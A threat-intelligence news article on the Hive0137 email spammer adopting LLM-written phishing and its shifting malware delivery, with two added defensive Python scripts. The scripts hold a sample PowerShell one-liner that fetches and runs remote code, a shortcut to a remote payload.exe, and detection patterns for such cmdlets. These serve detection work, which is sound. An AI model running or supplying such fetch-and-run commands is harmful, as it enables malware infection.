Hive0137 email spammer is now using AI to bolster its phishing campaigns

The Hive0137 threat actor has been observed using large language models (LLMs) to generate phishing emails that read more authentically and are harder to catch with traditional signature-based detection.

The new behavior was observed by the IBM X-Force threat intelligence team in an Italian campaign distributing Dave-crypted X-Worm. X-Force also noted that Hive0137 appears to use generative AI to build its tooling.

Hive0137 is a highly active email spammer that distributes malware used for initial access in ransomware attacks. Active since at least October 2023, the group has delivered payloads such as DarkGate, NetSupport, T34-Loader and Pikabot using what IBM X-Force describes as the “most complex infection chain,” one that often relies on advanced crypters. Those crypters point to a possible relationship with former members of ITG23, also known as the Conti/Trickbot group, suggesting that Hive0137 may be collaborating with, or has absorbed, members of ITG23.

Following “Operation Endgame,” a large-scale law enforcement action against several malware botnets, including IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot, X-Force observed Hive0137 introducing a new backdoor known as WarmCookie. The group also changed its payload delivery method, switching to Microsoft Project files with embedded macros that download NetSupport payloads.

Hive0137's campaigns have delivered emails carrying malicious PDF attachments or URLs that lead to malware such as DarkGate and NetSupport. The group has also adopted new loaders such as T34-Loader, with tactics that overlap Proofpoint's TA571 cluster.

In early 2024, Hive0137 expanded its techniques, experimenting with new attachment types, such as Excel files containing malicious URLs. These campaigns typically led to the download of VBS or JavaScript files, which then deployed the final payload, often the DarkGate malware.

In mid-June 2024, Hive0137 used HTML files that copy malicious PowerShell code into the user's clipboard and prompt the user to paste and run it, which downloads the WarmCookie backdoor.
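The clipboard-paste lure above ends with the victim executing PowerShell by hand, so the endpoint telemetry is the place to catch it. The script below is an added detection example, not code from the article or from IBM X-Force: it scores process-creation events for PowerShell started from an interactive parent (explorer.exe, which is what the Run dialog and File Explorer spawn; an assumption about how pasted commands are typically launched) combined with download-and-execute or hidden-window/encoded-command switches. The event records are constructed inline and the indicator list is a heuristic, not an X-Force signature.

```python
"""Heuristic detector for clipboard-pasted PowerShell (ClickFix-style) launches.

Added example, not from the article or IBM X-Force. Events use Sysmon-like
field names (ParentImage, Image, CommandLine, ProcessId); the sample events
below are constructed, and the indicators are assumptions about what a
pasted download-and-run one-liner usually looks like.
"""
import re
from typing import Iterable, List, Optional

# Parents that mean "a human launched this", e.g. Win+R or File Explorer (assumed).
INTERACTIVE_PARENTS = ("explorer.exe",)

# Cmdlets/aliases that fetch and run remote content in one step.
DOWNLOAD_EXEC = re.compile(
    r"(?i)\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest"
    r"|downloadstring|downloadfile)\b"
)

# Switches that hide the console or obscure the payload.
HIDDEN_OR_ENCODED = re.compile(
    r"(?i)(-w(indowstyle)?\s+h(idden)?\b"
    r"|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"
    r"|-nop\b)"
)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def assess_event(ev: dict) -> Optional[dict]:
    """Return an alert dict when the event looks like a pasted PowerShell lure, else None."""
    if _basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    indicators: List[str] = []
    if parent in INTERACTIVE_PARENTS:
        indicators.append("launched from " + parent)
    if DOWNLOAD_EXEC.search(cmd):
        indicators.append("download-and-execute cmdlet")
    if HIDDEN_OR_ENCODED.search(cmd):
        indicators.append("hidden window / encoded command")
    # Require the interactive parent plus at least one command-line indicator,
    # so a user simply opening PowerShell from Start is not flagged.
    if parent in INTERACTIVE_PARENTS and len(indicators) >= 2:
        return {"pid": ev.get("ProcessId"), "indicators": indicators, "cmdline": cmd}
    return None


def triage_events(events: Iterable[dict]) -> List[dict]:
    """Run assess_event over a stream of events and keep only the alerts."""
    return [alert for alert in (assess_event(e) for e in events) if alert is not None]


# Constructed sample events: one pasted lure, one scheduled admin script, one
# user opening an interactive PowerShell window with no arguments.
SAMPLE_EVENTS = [
    {
        "ProcessId": 4120,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iex (irm http://203.0.113.5/s)"',
    },
    {
        "ProcessId": 4188,
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\inventory.ps1",
    },
    {
        "ProcessId": 4201,
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
]

if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print(alert["pid"], alert["indicators"], alert["cmdline"])
```

Tune `INTERACTIVE_PARENTS` to your environment's telemetry (some EDRs report the Run dialog differently), and feed it real events rather than the constructed list before relying on the threshold.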

In a July 2024 campaign, Hive0137 targeted Italian-speaking victims with ZIP archives containing .URL files that linked to Dave-crypted X-Worm.
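A ZIP-wrapped Windows Internet Shortcut is a small, well-defined artifact, so it is worth parsing at the mail gateway rather than relying on a hash. The script below is an added example, not code from the article or from IBM X-Force: it opens a ZIP attachment in memory, finds every .url member, parses the documented [InternetShortcut] / URL= layout and classifies the target. The archive it inspects is constructed inline (a decoy text file plus one shortcut pointing at a file:// share on a documentation-range address), and the classification labels are this example's own.

```python
"""Triage ZIP attachments for Windows Internet Shortcut (.url) members.

Added example, not from the article or IBM X-Force. The .url layout
([InternetShortcut] section, URL= key) is the standard Windows format;
the sample archive is constructed in memory so the script runs offline.
"""
import configparser
import io
import zipfile
from typing import List, Optional
from urllib.parse import urlparse


def parse_internet_shortcut(data: bytes) -> Optional[str]:
    """Return the URL= target of a .url file, or None if it is not a valid shortcut."""
    text = data.decode("utf-8", errors="replace")
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    # Section names are case-sensitive in configparser; option names are not.
    section = next((s for s in cp.sections() if s.lower() == "internetshortcut"), None)
    if section is None:
        return None
    return cp[section].get("url")


def classify_target(target: Optional[str]) -> str:
    """Label a shortcut target with a coarse risk reason (labels are this example's own)."""
    if not target:
        return "malformed shortcut"
    if target.startswith("\\\\") or urlparse(target).scheme.lower() == "file":
        # UNC or file:// targets fetch from a remote share (often WebDAV) instead of a web page.
        return "remote file target"
    if urlparse(target).scheme.lower() in ("http", "https"):
        return "web target"
    return "unusual scheme"


def triage_zip(blob: bytes) -> List[dict]:
    """List every .url member of a ZIP blob with its parsed target and classification."""
    findings: List[dict] = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".url"):
                continue
            target = parse_internet_shortcut(zf.read(info))
            findings.append(
                {"member": info.filename, "target": target, "reason": classify_target(target)}
            )
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: a decoy text file and one shortcut with a double extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed decoy file")
        zf.writestr(
            "invoice.pdf.url",
            "[InternetShortcut]\r\nURL=file://203.0.113.10/share/payload.exe\r\n",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_archive()):
        print(finding)
```

Any .url inside an e-mail attachment is unusual enough to quarantine; the classification mainly tells the analyst whether the next hop is a web download or a remote file share.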

"Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI," the researchers said. "They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates."
